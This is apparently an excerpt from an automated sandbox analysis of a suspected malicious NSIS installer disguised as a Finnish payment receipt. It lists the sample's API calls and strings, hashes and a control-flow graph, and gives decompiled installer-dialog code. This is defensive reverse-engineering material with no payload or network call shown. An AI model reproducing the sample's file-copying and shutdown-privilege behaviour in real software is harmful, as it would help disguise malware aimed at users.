                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
                                                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734
                                                                                                                        • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004037FF
                                                                                                                      • ExitProcess.KERNEL32 ref: 00403820
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403833
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403842
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040384D
                                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Siirtokuitti_006703.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
                                                                                                                      • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038CF
                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\Siirtokuitti_006703.exe,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038E3
                                                                                                                      • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403946
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
                                                                                                                      • ExitProcess.KERNEL32 ref: 004039C6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                      • String ID: "C:\Users\user\Desktop\Siirtokuitti_006703.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standpost$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standpost\mos\Ensileringen$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Siirtokuitti_006703.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                      • API String ID: 2488574733-730525933
                                                                                                                      • Opcode ID: 474a237007d433326507808389763c7ec11de3b4caa67ed0dd1692d199e57bd8
                                                                                                                      • Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
                                                                                                                      • Opcode Fuzzy Hash: 474a237007d433326507808389763c7ec11de3b4caa67ed0dd1692d199e57bd8
                                                                                                                      • Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 139 404d90-404ddc GetDlgItem * 2 140 404de2-404e76 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404ffd-405004 139->141 142 404e85-404e8c DeleteObject 140->142 143 404e78-404e83 SendMessageW 140->143 144 405006-405016 141->144 145 405018 141->145 147 404e8e-404e96 142->147 143->142 146 40501b-405024 144->146 145->146 148 405026-405029 146->148 149 40502f-405035 146->149 150 404e98-404e9b 147->150 151 404ebf-404ec3 147->151 148->149 152 405113-40511a 148->152 155 405044-40504b 149->155 156 405037-40503e 149->156 153 404ea0-404ebd call 4063d2 SendMessageW * 2 150->153 154 404e9d 150->154 151->147 157 404ec5-404ef1 call 404345 * 2 151->157 162 40518b-405193 152->162 163 40511c-405122 152->163 153->151 154->153 159 4050c0-4050c3 155->159 160 40504d-405050 155->160 156->152 156->155 196 404ef7-404efd 157->196 197 404fbc-404fcf GetWindowLongW SetWindowLongW 157->197 159->152 164 4050c5-4050cf 159->164 168 405052-405059 160->168 169 40505b-405070 call 404cde 160->169 166 405195-40519b SendMessageW 162->166 167 40519d-4051a4 162->167 171 405373-405385 call 4043ac 163->171 172 405128-405132 163->172 174 4050d1-4050dd SendMessageW 164->174 175 4050df-4050e9 164->175 166->167 176 4051a6-4051ad 167->176 177 4051d8-4051df 167->177 168->159 168->169 169->159 195 405072-405083 169->195 172->171 180 405138-405147 SendMessageW 172->180 174->175 175->152 182 4050eb-4050f5 175->182 183 4051b6-4051bd 176->183 184 4051af-4051b0 ImageList_Destroy 176->184 187 405335-40533c 177->187 188 4051e5-4051f1 call 4011ef 177->188 180->171 189 40514d-40515e SendMessageW 180->189 191 405106-405110 182->191 192 4050f7-405104 182->192 193 4051c6-4051d2 183->193 194 4051bf-4051c0 GlobalFree 183->194 184->183 187->171 190 40533e-405345 187->190 214 405201-405204 188->214 215 4051f3-4051f6 188->215 199 405160-405166 189->199 200 405168-40516a 189->200 190->171 202 405347-405371 ShowWindow GetDlgItem ShowWindow 190->202 191->152 192->152 193->177 194->193 195->159 204 405085-405087 195->204 205 404f00-404f07 196->205 203 404fd5-404fd9 197->203 199->200 201 40516b-405184 call 401299 SendMessageW 199->201 200->201 201->162 202->171 208 404ff3-404ffb call 40437a 203->208 209 404fdb-404fee ShowWindow call 40437a 203->209 210 405089-405090 204->210 211 40509a 204->211 212 404f9d-404fb0 205->212 213 404f0d-404f35 205->213 208->141 209->171 224 405092-405094 210->224 225 405096-405098 210->225 228 40509d-4050b9 call 40117d 211->228 212->205 219 404fb6-404fba 212->219 226 404f37-404f6d SendMessageW 213->226 227 404f6f-404f71 213->227 220 405245-405269 call 4011ef 214->220 221 405206-40521f call 4012e2 call 401299 214->221 216 4051f8 215->216 217 4051f9-4051fc call 404d5e 215->217 216->217 217->214 219->197 219->203 241 40530b-40531f InvalidateRect 220->241 242 40526f 220->242 246 405221-405227 221->246 247 40522f-40523e SendMessageW 221->247 224->228 225->228 226->212 229 404f73-404f82 SendMessageW 227->229 230 404f84-404f9a SendMessageW 227->230 228->159 229->212 230->212 241->187 245 405321-405330 call 404cb1 call 404c99 241->245 243 405272-40527d 242->243 248 4052f3-405305 243->248 249 40527f-40528e 243->249 245->187 253 405229 246->253 254 40522a-40522d 246->254 247->220 248->241 248->243 251 405290-40529d 249->251 252 4052a1-4052a4 249->252 251->252 256 4052a6-4052a9 252->256 257 4052ab-4052b4 252->257 253->254 254->246 254->247 259 4052b9-4052f1 SendMessageW * 2 256->259 257->259 260 4052b6 257->260 259->248 260->259
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00404D90(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                                      				struct HWND__* _v8;
                                                                                                                      				struct HWND__* _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				signed char* _v28;
                                                                                                                      				long _v32;
                                                                                                                      				signed int _v40;
                                                                                                                      				long _v44;
                                                                                                                      				signed int* _v56;
                                                                                                                      				signed char* _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				long _v68;
                                                                                                                      				void* _v72;
                                                                                                                      				intOrPtr _v76;
                                                                                                                      				intOrPtr _v80;
                                                                                                                      				void* _v84;
                                                                                                                      				void* __ebx;
                                                                                                                      				void* __edi;
                                                                                                                      				void* __esi;
                                                                                                                      				signed int _t192;
                                                                                                                      				intOrPtr _t195;
                                                                                                                      				long _t201;
                                                                                                                      				signed int _t205;
                                                                                                                      				signed int _t216;
                                                                                                                      				void* _t219;
                                                                                                                      				void* _t220;
                                                                                                                      				int _t226;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t239;
                                                                                                                      				signed int _t241;
                                                                                                                      				signed char _t242;
                                                                                                                      				signed char _t248;
                                                                                                                      				void* _t252;
                                                                                                                      				void* _t254;
                                                                                                                      				signed char* _t270;
                                                                                                                      				signed char _t271;
                                                                                                                      				long _t273;
                                                                                                                      				long _t276;
                                                                                                                      				int _t279;
                                                                                                                      				int _t282;
                                                                                                                      				signed int _t283;
                                                                                                                      				long _t284;
                                                                                                                      				signed int _t287;
                                                                                                                      				signed int _t294;
                                                                                                                      				signed char* _t302;
                                                                                                                      				struct HWND__* _t306;
                                                                                                                      				int _t307;
                                                                                                                      				signed int* _t308;
                                                                                                                      				int _t309;
                                                                                                                      				long _t310;
                                                                                                                      				signed int _t311;
                                                                                                                      				void* _t313;
                                                                                                                      				long _t314;
                                                                                                                      				int _t315;
                                                                                                                      				signed int _t316;
                                                                                                                      				void* _t318;
                                                                                                                      
                                                                                                                      				_t306 = _a4;
                                                                                                                      				_v12 = GetDlgItem(_t306, 0x3f9);
                                                                                                                      				_v8 = GetDlgItem(_t306, 0x408);
                                                                                                                      				_t318 = SendMessageW;
                                                                                                                      				_v20 =  *0x42a288;
                                                                                                                      				_t282 = 0;
                                                                                                                      				_v24 =  *0x42a254 + 0x94;
                                                                                                                      				if(_a8 != 0x110) {
                                                                                                                      					L23:
                                                                                                                      					if(_a8 != 0x405) {
                                                                                                                      						_t285 = _a16;
                                                                                                                      					} else {
                                                                                                                      						_a12 = _t282;
                                                                                                                      						_t285 = 1;
                                                                                                                      						_a8 = 0x40f;
                                                                                                                      						_a16 = 1;
                                                                                                                      					}
                                                                                                                      					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                                      						_v16 = _t285;
                                                                                                                      						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                                                                                                      							if(( *0x42a25d & 0x00000002) != 0) {
                                                                                                                      								L41:
                                                                                                                      								if(_v16 != _t282) {
                                                                                                                      									_t231 = _v16;
                                                                                                                      									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
                                                                                                                      										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
                                                                                                                      									}
                                                                                                                      									_t232 = _v16;
                                                                                                                      									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
                                                                                                                      										_t285 = _v20;
                                                                                                                      										_t233 =  *(_t232 + 0x5c);
                                                                                                                      										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                                                                                      											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
                                                                                                                      										} else {
                                                                                                                      											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								goto L48;
                                                                                                                      							}
                                                                                                                      							if(_a8 == 0x413) {
                                                                                                                      								L33:
                                                                                                                      								_t285 = 0 | _a8 != 0x00000413;
                                                                                                                      								_t239 = E00404CDE(_v8, _a8 != 0x413);
                                                                                                                      								_t311 = _t239;
                                                                                                                      								if(_t311 >= _t282) {
                                                                                                                      									_t88 = _v20 + 8; // 0x8
                                                                                                                      									_t285 = _t239 * 0x818 + _t88;
                                                                                                                      									_t241 =  *_t285;
                                                                                                                      									if((_t241 & 0x00000010) == 0) {
                                                                                                                      										if((_t241 & 0x00000040) == 0) {
                                                                                                                      											_t242 = _t241 ^ 0x00000001;
                                                                                                                      										} else {
                                                                                                                      											_t248 = _t241 ^ 0x00000080;
                                                                                                                      											if(_t248 >= 0) {
                                                                                                                      												_t242 = _t248 & 0x000000fe;
                                                                                                                      											} else {
                                                                                                                      												_t242 = _t248 | 0x00000001;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      										 *_t285 = _t242;
                                                                                                                      										E0040117D(_t311);
                                                                                                                      										_a12 = _t311 + 1;
                                                                                                                      										_a16 =  !( *0x42a25c) >> 0x00000008 & 0x00000001;
                                                                                                                      										_a8 = 0x40f;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								goto L41;
                                                                                                                      							}
                                                                                                                      							_t285 = _a16;
                                                                                                                      							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                                      								goto L41;
                                                                                                                      							}
                                                                                                                      							goto L33;
                                                                                                                      						} else {
                                                                                                                      							goto L48;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						L48:
                                                                                                                      						if(_a8 != 0x111) {
                                                                                                                      							L56:
                                                                                                                      							if(_a8 == 0x200) {
                                                                                                                      								SendMessageW(_v8, 0x200, _t282, _t282);
                                                                                                                      							}
                                                                                                                      							if(_a8 == 0x40b) {
                                                                                                                      								_t219 =  *0x42370c;
                                                                                                                      								if(_t219 != _t282) {
                                                                                                                      									ImageList_Destroy(_t219);
                                                                                                                      								}
                                                                                                                      								_t220 =  *0x423720;
                                                                                                                      								if(_t220 != _t282) {
                                                                                                                      									GlobalFree(_t220);
                                                                                                                      								}
                                                                                                                      								 *0x42370c = _t282;
                                                                                                                      								 *0x423720 = _t282;
                                                                                                                      								 *0x42a2c0 = _t282;
                                                                                                                      							}
                                                                                                                      							if(_a8 != 0x40f) {
                                                                                                                      								L88:
                                                                                                                      								if(_a8 == 0x420 && ( *0x42a25d & 0x00000001) != 0) {
                                                                                                                      									_t307 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                      									ShowWindow(_v8, _t307);
                                                                                                                      									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                                                                                      								}
                                                                                                                      								goto L91;
                                                                                                                      							} else {
                                                                                                                      								E004011EF(_t285, _t282, _t282);
                                                                                                                      								_t192 = _a12;
                                                                                                                      								if(_t192 != _t282) {
                                                                                                                      									if(_t192 != 0xffffffff) {
                                                                                                                      										_t192 = _t192 - 1;
                                                                                                                      									}
                                                                                                                      									_push(_t192);
                                                                                                                      									_push(8);
                                                                                                                      									E00404D5E();
                                                                                                                      								}
                                                                                                                      								if(_a16 == _t282) {
                                                                                                                      									L75:
                                                                                                                      									E004011EF(_t285, _t282, _t282);
                                                                                                                      									_v32 =  *0x423720;
                                                                                                                      									_t195 =  *0x42a288;
                                                                                                                      									_v60 = 0xf030;
                                                                                                                      									_v20 = _t282;
                                                                                                                      									if( *0x42a28c <= _t282) {
                                                                                                                      										L86:
                                                                                                                      										InvalidateRect(_v8, _t282, "true");
                                                                                                                      										if( *((intOrPtr*)( *0x42921c + 0x10)) != _t282) {
                                                                                                                      											E00404C99(0x3ff, 0xfffffffb, E00404CB1(5));
                                                                                                                      										}
                                                                                                                      										goto L88;
                                                                                                                      									}
                                                                                                                      									_t308 = _t195 + 8;
                                                                                                                      									do {
                                                                                                                      										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                                                                                      										if(_t201 != _t282) {
                                                                                                                      											_t287 =  *_t308;
                                                                                                                      											_v68 = _t201;
                                                                                                                      											_v72 = 8;
                                                                                                                      											if((_t287 & 0x00000001) != 0) {
                                                                                                                      												_v72 = 9;
                                                                                                                      												_v56 =  &(_t308[4]);
                                                                                                                      												_t308[0] = _t308[0] & 0x000000fe;
                                                                                                                      											}
                                                                                                                      											if((_t287 & 0x00000040) == 0) {
                                                                                                                      												_t205 = (_t287 & 0x00000001) + 1;
                                                                                                                      												if((_t287 & 0x00000010) != 0) {
                                                                                                                      													_t205 = _t205 + 3;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												_t205 = 3;
                                                                                                                      											}
                                                                                                                      											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                                                                                      											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                                                                      											SendMessageW(_v8, 0x113f, _t282,  &_v72);
                                                                                                                      										}
                                                                                                                      										_v20 = _v20 + 1;
                                                                                                                      										_t308 =  &(_t308[0x206]);
                                                                                                                      									} while (_v20 <  *0x42a28c);
                                                                                                                      									goto L86;
                                                                                                                      								} else {
                                                                                                                      									_t309 = E004012E2( *0x423720);
                                                                                                                      									E00401299(_t309);
                                                                                                                      									_t216 = 0;
                                                                                                                      									_t285 = 0;
                                                                                                                      									if(_t309 <= _t282) {
                                                                                                                      										L74:
                                                                                                                      										SendMessageW(_v12, 0x14e, _t285, _t282);
                                                                                                                      										_a16 = _t309;
                                                                                                                      										_a8 = 0x420;
                                                                                                                      										goto L75;
                                                                                                                      									} else {
                                                                                                                      										goto L71;
                                                                                                                      									}
                                                                                                                      									do {
                                                                                                                      										L71:
                                                                                                                      										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                                                                                                      											_t285 = _t285 + 1;
                                                                                                                      										}
                                                                                                                      										_t216 = _t216 + 1;
                                                                                                                      									} while (_t216 < _t309);
                                                                                                                      									goto L74;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                                      							goto L91;
                                                                                                                      						} else {
                                                                                                                      							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
                                                                                                                      							if(_t226 == 0xffffffff) {
                                                                                                                      								goto L91;
                                                                                                                      							}
                                                                                                                      							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
                                                                                                                      							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                                                                                                      								_t310 = 0x20;
                                                                                                                      							}
                                                                                                                      							E00401299(_t310);
                                                                                                                      							SendMessageW(_a4, 0x420, _t282, _t310);
                                                                                                                      							_a12 = _a12 | 0xffffffff;
                                                                                                                      							_a16 = _t282;
                                                                                                                      							_a8 = 0x40f;
                                                                                                                      							goto L56;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					_v32 = 0;
                                                                                                                      					_v16 = 2;
                                                                                                                      					 *0x42a2c0 = _t306;
                                                                                                                      					 *0x423720 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                                                                                      					_t252 = LoadBitmapW( *0x42a240, 0x6e);
                                                                                                                      					 *0x423714 =  *0x423714 | 0xffffffff;
                                                                                                                      					_t313 = _t252;
                                                                                                                      					 *0x42371c = SetWindowLongW(_v8, 0xfffffffc, E00405388);
                                                                                                                      					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                                                      					 *0x42370c = _t254;
                                                                                                                      					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                                                                                      					SendMessageW(_v8, 0x1109, 2,  *0x42370c);
                                                                                                                      					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                                      						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                                                      					}
                                                                                                                      					DeleteObject(_t313);
                                                                                                                      					_t314 = 0;
                                                                                                                      					do {
                                                                                                                      						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                                                                                      						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                                                                                      							if(_t314 != 0x20) {
                                                                                                                      								_v16 = _t282;
                                                                                                                      							}
                                                                                                                      							_t279 = SendMessageW(_v12, 0x143, _t282, E004063D2(_t282, _t314, _t318, _t282, _t260)); // executed
                                                                                                                      							SendMessageW(_v12, 0x151, _t279, _t314);
                                                                                                                      						}
                                                                                                                      						_t314 = _t314 + 1;
                                                                                                                      					} while (_t314 < 0x21);
                                                                                                                      					_t315 = _a16;
                                                                                                                      					_t283 = _v16;
                                                                                                                      					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                                                                                      					_push(0x15);
                                                                                                                      					E00404345(_a4);
                                                                                                                      					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                                                                                      					_push(0x16);
                                                                                                                      					E00404345(_a4);
                                                                                                                      					_t316 = 0;
                                                                                                                      					_t284 = 0;
                                                                                                                      					if( *0x42a28c <= 0) {
                                                                                                                      						L19:
                                                                                                                      						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                      						goto L20;
                                                                                                                      					} else {
                                                                                                                      						_t302 = _v20 + 8;
                                                                                                                      						_v28 = _t302;
                                                                                                                      						do {
                                                                                                                      							_t270 =  &(_t302[0x10]);
                                                                                                                      							if( *_t270 != 0) {
                                                                                                                      								_v60 = _t270;
                                                                                                                      								_t271 =  *_t302;
                                                                                                                      								_t294 = 0x20;
                                                                                                                      								_v84 = _t284;
                                                                                                                      								_v80 = 0xffff0002;
                                                                                                                      								_v76 = 0xd;
                                                                                                                      								_v64 = _t294;
                                                                                                                      								_v40 = _t316;
                                                                                                                      								_v68 = _t271 & _t294;
                                                                                                                      								if((_t271 & 0x00000002) == 0) {
                                                                                                                      									if((_t271 & 0x00000004) == 0) {
                                                                                                                      										_t273 = SendMessageW(_v8, 0x1132, 0,  &_v84); // executed
                                                                                                                      										 *( *0x423720 + _t316 * 4) = _t273;
                                                                                                                      									} else {
                                                                                                                      										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									_v76 = 0x4d;
                                                                                                                      									_v44 = 1;
                                                                                                                      									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                                                                                      									_v32 = 1;
                                                                                                                      									 *( *0x423720 + _t316 * 4) = _t276;
                                                                                                                      									_t284 =  *( *0x423720 + _t316 * 4);
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							_t316 = _t316 + 1;
                                                                                                                      							_t302 =  &(_v28[0x818]);
                                                                                                                      							_v28 = _t302;
                                                                                                                      						} while (_t316 <  *0x42a28c);
                                                                                                                      						if(_v32 != 0) {
                                                                                                                      							L20:
                                                                                                                      							if(_v16 != 0) {
                                                                                                                      								E0040437A(_v8);
                                                                                                                      								_t282 = 0;
                                                                                                                      								goto L23;
                                                                                                                      							} else {
                                                                                                                      								ShowWindow(_v12, 5);
                                                                                                                      								E0040437A(_v12);
                                                                                                                      								L91:
                                                                                                                      								return E004043AC(_a8, _a12, _a16);
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L19;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}






























































                                                                                                                      0x00404d9f
                                                                                                                      0x00404db0
                                                                                                                      0x00404db5
                                                                                                                      0x00404dbd
                                                                                                                      0x00404dc3
                                                                                                                      0x00404dcb
                                                                                                                      0x00404dd9
                                                                                                                      0x00404ddc
                                                                                                                      0x00404ffd
                                                                                                                      0x00405004
                                                                                                                      0x00405018
                                                                                                                      0x00405006
                                                                                                                      0x00405008
                                                                                                                      0x0040500b
                                                                                                                      0x0040500c
                                                                                                                      0x00405013
                                                                                                                      0x00405013
                                                                                                                      0x00405024
                                                                                                                      0x00405032
                                                                                                                      0x00405035
                                                                                                                      0x0040504b
                                                                                                                      0x004050c0
                                                                                                                      0x004050c3
                                                                                                                      0x004050c5
                                                                                                                      0x004050cf
                                                                                                                      0x004050dd
                                                                                                                      0x004050dd
                                                                                                                      0x004050df
                                                                                                                      0x004050e9
                                                                                                                      0x004050ef
                                                                                                                      0x004050f2
                                                                                                                      0x004050f5
                                                                                                                      0x00405110
                                                                                                                      0x004050f7
                                                                                                                      0x00405101
                                                                                                                      0x00405101
                                                                                                                      0x004050f5
                                                                                                                      0x004050e9
                                                                                                                      0x00000000
                                                                                                                      0x004050c3
                                                                                                                      0x00405050
                                                                                                                      0x0040505b
                                                                                                                      0x00405060
                                                                                                                      0x00405067
                                                                                                                      0x0040506c
                                                                                                                      0x00405070
                                                                                                                      0x0040507b
                                                                                                                      0x0040507b
                                                                                                                      0x0040507f
                                                                                                                      0x00405083
                                                                                                                      0x00405087
                                                                                                                      0x0040509a
                                                                                                                      0x00405089
                                                                                                                      0x00405089
                                                                                                                      0x00405090
                                                                                                                      0x00405096
                                                                                                                      0x00405092
                                                                                                                      0x00405092
                                                                                                                      0x00405092
                                                                                                                      0x00405090
                                                                                                                      0x0040509e
                                                                                                                      0x004050a0
                                                                                                                      0x004050b3
                                                                                                                      0x004050b6
                                                                                                                      0x004050b9
                                                                                                                      0x004050b9
                                                                                                                      0x00405083
                                                                                                                      0x00000000
                                                                                                                      0x00405070
                                                                                                                      0x00405052
                                                                                                                      0x00405059
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405113
                                                                                                                      0x00405113
                                                                                                                      0x0040511a
                                                                                                                      0x0040518b
                                                                                                                      0x00405193
                                                                                                                      0x0040519b
                                                                                                                      0x0040519b
                                                                                                                      0x004051a4
                                                                                                                      0x004051a6
                                                                                                                      0x004051ad
                                                                                                                      0x004051b0
                                                                                                                      0x004051b0
                                                                                                                      0x004051b6
                                                                                                                      0x004051bd
                                                                                                                      0x004051c0
                                                                                                                      0x004051c0
                                                                                                                      0x004051c6
                                                                                                                      0x004051cc
                                                                                                                      0x004051d2
                                                                                                                      0x004051d2
                                                                                                                      0x004051df
                                                                                                                      0x00405335
                                                                                                                      0x0040533c
                                                                                                                      0x00405359
                                                                                                                      0x0040535f
                                                                                                                      0x00405371
                                                                                                                      0x00405371
                                                                                                                      0x00000000
                                                                                                                      0x004051e5
                                                                                                                      0x004051e7
                                                                                                                      0x004051ec
                                                                                                                      0x004051f1
                                                                                                                      0x004051f6
                                                                                                                      0x004051f8
                                                                                                                      0x004051f8
                                                                                                                      0x004051f9
                                                                                                                      0x004051fa
                                                                                                                      0x004051fc
                                                                                                                      0x004051fc
                                                                                                                      0x00405204
                                                                                                                      0x00405245
                                                                                                                      0x00405247
                                                                                                                      0x00405257
                                                                                                                      0x0040525a
                                                                                                                      0x0040525f
                                                                                                                      0x00405266
                                                                                                                      0x00405269
                                                                                                                      0x0040530b
                                                                                                                      0x00405311
                                                                                                                      0x0040531f
                                                                                                                      0x00405330
                                                                                                                      0x00405330
                                                                                                                      0x00000000
                                                                                                                      0x0040531f
                                                                                                                      0x0040526f
                                                                                                                      0x00405272
                                                                                                                      0x00405278
                                                                                                                      0x0040527d
                                                                                                                      0x0040527f
                                                                                                                      0x00405281
                                                                                                                      0x00405287
                                                                                                                      0x0040528e
                                                                                                                      0x00405293
                                                                                                                      0x0040529a
                                                                                                                      0x0040529d
                                                                                                                      0x0040529d
                                                                                                                      0x004052a4
                                                                                                                      0x004052b0
                                                                                                                      0x004052b4
                                                                                                                      0x004052b6
                                                                                                                      0x004052b6
                                                                                                                      0x004052a6
                                                                                                                      0x004052a8
                                                                                                                      0x004052a8
                                                                                                                      0x004052d6
                                                                                                                      0x004052e2
                                                                                                                      0x004052f1
                                                                                                                      0x004052f1
                                                                                                                      0x004052f3
                                                                                                                      0x004052f6
                                                                                                                      0x004052ff
                                                                                                                      0x00000000
                                                                                                                      0x00405206
                                                                                                                      0x00405211
                                                                                                                      0x00405214
